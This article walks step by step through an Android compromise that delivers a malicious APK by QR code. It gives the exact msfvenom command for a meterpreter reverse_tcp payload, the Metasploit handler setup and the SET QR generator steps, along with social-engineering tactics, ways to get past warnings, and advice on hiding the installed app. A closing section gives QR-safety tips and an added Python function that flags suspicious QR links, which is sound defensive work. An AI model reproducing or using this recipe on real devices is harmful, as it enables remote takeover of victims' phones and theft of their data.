This method is not completely automatic, meaning the target will have a role to play. Consequently, social engineering is a critical component.

In addition, the method might not work on every Android device. Security settings, presence of anti-viruses, and Google safety mechanisms are just a few of the possible obstacles to a successful attack.

Tools we are going to use: Kali Linux (OS), Metasploit and Social Engineering Toolkit (SET)

Step 1

The first step is to use msfvenom to prepare the payload, the code that will allow the threat actor to obtain access to the target’s device.

Open the terminal and type the following:

Code: msfvenom -p android/meterpreter/reverse_tcp lhost=youripaddress lport=4444 r >/var/www/html/test.apk

Lhost (local host) indicates the IP that the payload will use to connect back to the threat actor’s machine.
If, for instance, the machine and the smartphone are connected to the same Wi-Fi, the IP can be found by typing in the terminal “ifconfig” and checking the “inet” (internet address) of the Wi-Fi card.
If the smartphone is using mobile data or is connected to another router, the threat actor must use the public IP of his machine. It can be found by visiting http://whatismyipaddress.com.

Step 2

In the terminal, type “service apache2 start” and press [Enter]. Now, it is time to launch Metasploit. To properly run this tool, there are a few steps that should be followed. First, type “service postgresql start” and press [Enter].

Next, run the command “msfdb init”. Finally, run “msfconsole” to launch the tool.

Step 3

Type “use exploit/multi/handler” and press [Enter]. Then, type “set payload android/meterpreter/reverse_tcp” and press [Enter]. Now, type “show options” to see the information needed to execute the attack.

As you can see from the screenshot, LHOST must be provided. LHOST, as mentioned, is the IP address used by the threat actor. To provide the information, type “set lhost” followed by your IP address. The format is “set [space] lhost [space] youripaddress”. As a final input, type “exploit” and press [Enter]. Remember, do not close the terminal.

Step 4

Open another terminal, type “setoolkit”, and press [Enter].

Type “1” (to select “Social-Engineering Attacks”) and press [Enter].

Next, type “8” (to select “QRCode Generator Attack Vector”) and press [Enter]. When requested, type the IP address you used before followed by “/” and the payload, in this case “test.apk”. The format is the following: “youripaddress/nameofthepayload.apk”.

Step 5

Exit SEToolkit and type “cd /root/.set/reports” to find the folder where the QR code has been saved. At this point, the threat actor must use social engineering to convince the target to scan the code.

Step 6

The target scans the QR code. He receives a request to download the application.

He is convinced that he is downloading an application he needs. Therefore, he follows the steps and successfully installs the app.

Step 7

The moment the app is installed on the target’s device, the threat actor notices that a meterpreter session is now open. Typing “sysinfo” allows him to check if the operation has been successful. After confirming the positive results, he types “help” to visualize the many commands that can be executed.

Known obstacles

There are a few obstacles that must be addressed. Social engineering is halfway between a skill and an art. It is not easy, but depending on the situation, anyone can be tricked. Tiredness, hurriedness, boredom, anger: there are several emotions and states of mind that can be exploited. However, there are also technical challenges that might compromise the outcome of the attack.

First, not all QR scanners search the link directly. I used four scanners, and two of them searched the link on Google instead of searching it directly. Second, security mechanisms might hinder the process. If the target does not allow the installation of apps from unknown sources, the file will not be downloaded. Moreover, during the installation, Play Protect warned me twice regarding my actions. It happens that users just keep tapping without reading to make the notifications go away, but a more rational user might think again about downloading the file. In addition, before installing the app, a list of permissions is displayed, and the user might ask himself why the app needs access to virtually everything.

Third, the name. As you can see from the screenshots, “MainActivity” is very likely to alert most users. Moreover, the app is visibly different from a ‘classic’ one.


While there are methods to avoid the obstacles I listed, it is likely that a user would not download, or install, the application if multiple alerts warn him of suspicious activity. A situation where the threat actor has access, even briefly, to the target’s smartphone might provide the perfect opportunity to download the malicious file. It takes a few seconds and, when the app is installed, the threat actor could hide it in an unusual directory, possibly hidden. The moment the meterpreter session is open, the threat actor can further exploit the device, including sending the same QR code to other users via the target’s device.

QR codes, as demonstrated, can be used as a vector to compromise your device. The method I explained requires the target to manually download the malicious file, but many other exploits are automatic and stealthy and do not require further actions after scanning the code. Be careful about what you scan. Even a seemingly innocent QR code could lead to a harmful outcome. When you scan a code, think carefully about the following:

Necessity. Do I really need to scan this code? Or am I just curious?

The need to use a QR code. Are there other download methods? Is the source of the QR code a reputable one?

The permissions. How many permissions is the app asking me for? Is it rational for such an app to ask for access to these sources?

Security alerts. If you see an alert, stop and read. Remember, haste makes waste.
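
The checks above can also be applied automatically to the text a scanner decodes, before anything is opened. The following is an added example, not part of the original article: a small Python triage function that flags the traits of the QR content described in Step 4 (a bare IP address followed by an .apk file, with no HTTPS). The function name, the finding labels and the sample strings are assumptions made for illustration; the IP address is a documentation address.

```python
import ipaddress
from urllib.parse import urlsplit


def triage_qr_payload(text):
    """Return a list of findings for the text decoded from a QR code."""
    findings = []
    raw = text.strip()
    # Many scanners treat scheme-less text as a web address, so parse it that way.
    has_scheme = "://" in raw
    url = urlsplit(raw if has_scheme else "http://" + raw)
    if not has_scheme:
        findings.append("no-scheme")
    elif url.scheme.lower() != "https":
        findings.append("not-https")
    # A legitimate app link normally points at a named site or an app store,
    # not at a raw IP address.
    try:
        ipaddress.ip_address(url.hostname or "")
        findings.append("ip-literal-host")
    except ValueError:
        pass
    # A direct .apk link means sideloading, outside the store's review.
    if url.path.lower().endswith(".apk"):
        findings.append("apk-download")
    return findings


if __name__ == "__main__":
    # Constructed samples; 192.0.2.10 is a documentation address (RFC 5737).
    samples = [
        "192.0.2.10/test.apk",
        "http://example.com/app.APK?x=1",
        "https://example.com/menu",
    ]
    for sample in samples:
        result = triage_qr_payload(sample)
        print(sample, "->", ", ".join(result) if result else "no findings")
```

Any finding is a reason to stop and read before tapping; "ip-literal-host" together with "apk-download" matches the format used in this walkthrough.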

